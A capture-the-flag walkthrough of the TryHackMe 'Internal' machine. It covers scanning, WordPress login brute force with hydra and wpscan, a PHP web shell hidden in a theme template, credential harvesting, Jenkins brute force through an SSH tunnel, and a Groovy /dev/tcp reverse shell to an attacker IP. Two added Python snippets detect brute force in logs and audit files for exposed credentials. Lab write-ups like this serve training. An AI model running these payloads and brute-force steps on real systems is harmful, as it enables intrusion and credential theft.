# Internal
## Recon
```
script is running. Author:meowhecker
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-18 13:04 CST
Nmap scan report for 10.10.175.229
Host is up (0.24s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6efaefbef65f98b9597bf78eb9c5621e (RSA)
| 256 ed64ed33e5c93058ba23040d14eb30e9 (ECDSA)
|_ 256 b07f7f7b5262622a60d43d36fa89eeff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/18%OT=22%CT=1%CU=38783%PV=Y%DS=5%DC=T%G=Y%TM=63F0605
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O
OS:3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=F4B3%W2=
OS:F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M505NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 117.22 ms 10.17.0.1
2 ... 4
5 237.98 ms 10.10.175.229
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1046.65 seconds
```
## Enumerate
```
---- Scanning URL: http://10.10.175.229:80/ ----
==> DIRECTORY: http://10.10.175.229:80/blog/
+ http://10.10.175.229:80/index.html (CODE:200|SIZE:10918)
==> DIRECTORY: http://10.10.175.229:80/javascript/
==> DIRECTORY: http://10.10.175.229:80/phpmyadmin/
+ http://10.10.175.229:80/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://10.10.175.229:80/wordpress/
```
---
```
http://10.10.175.229:80/phpmyadmin/
php -> Database Manager
```
---
## Potentially vulnerable points

```
vim /etc/hosts
<ip address> <--> <Domain Name>
```

http://internal.thm/blog/
WordPress login page.

Testing with 123:123.

The response "Unknown username" reveals whether an account exists, so this error message can be used to enumerate valid usernames.
POST request:
```
POST /blog/wp-login.php HTTP/1.1
Host: internal.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://internal.thm/blog/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Origin: http://internal.thm
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
log=meow&pwd=meow&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1
```
Testing the username
URL path: /blog/wp-login.php
Data: log=meow&pwd=meow&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1
Error message: admin is incorrect
```
hydra -l admin -P wordlists/rockyou.txt internal.thm http-post-form "/blog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=1:admin is incorrect"
```
```
[80][http-post-form] host: internal.thm login: admin password: 123456
[80][http-post-form] host: internal.thm login: admin password: 12345
[80][http-post-form] host: internal.thm login: admin password: 12345678
[80][http-post-form] host: internal.thm login: admin password: babygirl
[80][http-post-form] host: internal.thm login: admin password: password
[80][http-post-form] host: internal.thm login: admin password: abc123
[80][http-post-form] host: internal.thm login: admin password: daniel
[80][http-post-form] host: internal.thm login: admin password: 1234567
[80][http-post-form] host: internal.thm login: admin password: jessica
[80][http-post-form] host: internal.thm login: admin password: rockyou
[80][http-post-form] host: internal.thm login: admin password: iloveyou
[80][http-post-form] host: internal.thm login: admin password: princess
[80][http-post-form] host: internal.thm login: admin password: lovely
[80][http-post-form] host: internal.thm login: admin password: 123456789
[80][http-post-form] host: internal.thm login: admin password: monkey
[80][http-post-form] host: internal.thm login: admin password: nicole
```
Judging by the results above (every rockyou candidate is reported as a hit, so the failure string did not match the response), hydra probably cannot be used directly to get initial access to WordPress.
However, we already know the target runs WordPress (CMS), so we can look for WordPress-specific scanning tools to use against it.
https://github.com/wpscanteam/wpscan
WordPress security scanner.
Info
```
wpscan --url internal.thm/wordpress/ --passwords wordlists/rockyou.txt --usernames admin --max-threads 50
```
```
WordPress version 5.4.2 identified
WordPress theme in use: twentyseventeen
```
```
Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys
```
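Both the hydra run against wp-login.php and the wpscan password attack over XML-RPC leave a dense burst of POSTs in the web server's access log. As an added detection example (not part of the original write-up), the script below parses Apache combined-log lines, constructed here to mimic those requests, and flags any client that posts to the login endpoints at least a threshold number of times inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined-log format: pull out client IP, timestamp, method, path and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# The two endpoints abused above: the login form (hydra) and XML-RPC (wpscan).
LOGIN_PATHS = {"/blog/wp-login.php", "/wordpress/xmlrpc.php"}

def parse_line(line):
    """Return (ip, datetime, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"])

def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak_hits} for IPs that POST to a login endpoint >= threshold times inside
    any sliding window (sliding, not fixed buckets, so a burst straddling a minute is caught)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in LOGIN_PATHS:
            per_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

def _line(ip, ts, path, status):  # builds one constructed log line
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "POST {path} HTTP/1.1" {status} 4100 "-" "Mozilla/5.0"'

# Constructed sample: one host hits the login form and then XML-RPC every 2 s
# (16 POSTs in 30 s); a second host logs in twice, minutes apart, like a real user.
T0 = datetime.strptime("18/Feb/2023:13:30:00 +0800", TS_FMT)
SAMPLE_LOG = (
    [_line("10.17.11.72", T0 + timedelta(seconds=2 * i), "/blog/wp-login.php", 200) for i in range(8)]
    + [_line("10.17.11.72", T0 + timedelta(seconds=16 + 2 * i), "/wordpress/xmlrpc.php", 200) for i in range(8)]
    + [_line("10.10.14.5", T0 + timedelta(minutes=m), "/blog/wp-login.php", 302) for m in (3, 9)]
)
```

Running `detect_bruteforce(SAMPLE_LOG)` reports only the bursting host; the legitimate user's two logins, six minutes apart, never reach the threshold.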

```
admin@internal.thm
```
## A private article

```
Will's credentials. william:arnold147
```

SSH failed and phpMyAdmin failed too, so I consulted someone else's write-up:
[WordPress: Reverse Shell](https://www.hackingarticles.in/wordpress-reverse-shell/)
It describes several ways to get a shell on WordPress; one of them is injecting malicious code into a WP theme.

Upload the PHP shell.

A better approach is to put it into the 404 (Not Found) template, because that hides the web shell better.
## Privilege escalation
First look for the web application's configuration file:
/var/www/wordpress

```
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
/** MySQL database password */
define( 'DB_PASSWORD', 'wordpress123' );
```
```
cat passwd | grep home
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash
```
aubreanna -> a valid user
Search for files that mention aubreanna:
```
grep -rni "aubreanna" / 2>/dev/null
```
```
/opt/wp-save.txt:3:Aubreanna needed these credentials for something later. Let her know you have them and where they are.
/opt/wp-save.txt:5:aubreanna:bubb13guM!@#123
```
Attempt SSH login

With this we have obtained a regular user account.
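The whole step from www-data to aubreanna rests on credentials left in files the web server user could read (the database defines and /opt/wp-save.txt). As an added audit example (mine, not from the write-up), the script below walks a directory tree and reports world-readable files containing user:password lines or a WordPress DB_PASSWORD define, reporting locations but never the secrets; the fixture tree, file contents and PLACEHOLDER passwords are constructed, mirroring only the paths seen above.

```python
import os
import re
import stat
import tempfile

# Credential shapes found on this box: "user:password" lines (wp-save.txt, note.txt)
# and the DB_PASSWORD define in the WordPress config. "(?!//)" keeps URLs like http://host out.
CRED_PATTERNS = [
    re.compile(r"^[a-z_][a-z0-9_-]{0,31}:(?!//)\S{6,}$"),
    re.compile(r"define\(\s*'DB_PASSWORD'\s*,\s*'[^']+'\s*\)"),
]

def world_readable(path):
    """True when 'others' can read the file, the bit that exposed /opt/wp-save.txt."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)

def audit_tree(root, max_bytes=1_000_000):
    """Return [(path, line_no)] for world-readable files under root holding a credential-looking line."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if not world_readable(path) or os.path.getsize(path) > max_bytes:
                    continue
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    for no, line in enumerate(fh, 1):
                        if any(p.search(line.strip()) for p in CRED_PATTERNS):
                            findings.append((path, no))
                            break  # one hit per file is enough to triage it
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the audit
    return findings

def build_sample_tree():
    """Constructed fixture mirroring the write-up's paths; passwords are PLACEHOLDER values."""
    root = tempfile.mkdtemp()
    fixtures = {
        "opt/wp-save.txt": "Aubreanna needed these credentials for something later.\n\naubreanna:PLACEHOLDER_pw1\n",
        "var/www/wordpress/wp-config.php": "<?php\ndefine( 'DB_USER', 'wordpress' );\ndefine( 'DB_PASSWORD', 'PLACEHOLDER_pw2' );\n",
        "home/aubreanna/jenkins.txt": "Internal Jenkins service is running on 172.17.0.2:8080\n",
        "root/note.txt": "root:PLACEHOLDER_pw3\n",  # kept 0600, so a correct audit must NOT report it
    }
    for rel, body in fixtures.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o600 if rel.startswith("root/") else 0o644)
    return root
```

`audit_tree(build_sample_tree())` flags the two world-readable credential files and correctly ignores both the 0600 root note and the Jenkins address note, whose "host:port" line is not a credential.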
Info
```
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
```
172.17.0.2 -> from this address we can infer that the service is running inside Docker.
We can use SSH port forwarding to reach the service on 172.17.0.2 from our local machine.


```
ssh -N -L 4444:172.17.0.2:8080 aubreanna@10.10.17.163
```

```
POST /j_acegi_security_check HTTP/1.1
Host: 127.0.0.1:4444
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Origin: http://127.0.0.1:4444
Connection: close
Referer: http://127.0.0.1:4444/loginError
Cookie: JSESSIONID.6126d275=node01k8mll4jgxgmq1mumpy1l10afa0.node0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
j_username=admin&j_password=meow&from=%2F&Submit=Sign+in
```
Hydra login
```
hydra -l admin -P wordlists/rockyou.txt 127.0.0.1 -s 4444 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
```
-s specifies the port number
```
[4444][http-post-form] host: 127.0.0.1 login: admin password: spongebob
```
Java reverse shell (Pentest Monkey)
```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.17.11.72/6666;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

```
cat note.txt
Aubreanna,
Will wanted these credentials secured behind the Jenkins,container since we have several layers of defense here. Use them if you
need access to the root user account.
root:tr0ub13guM!@#123
```
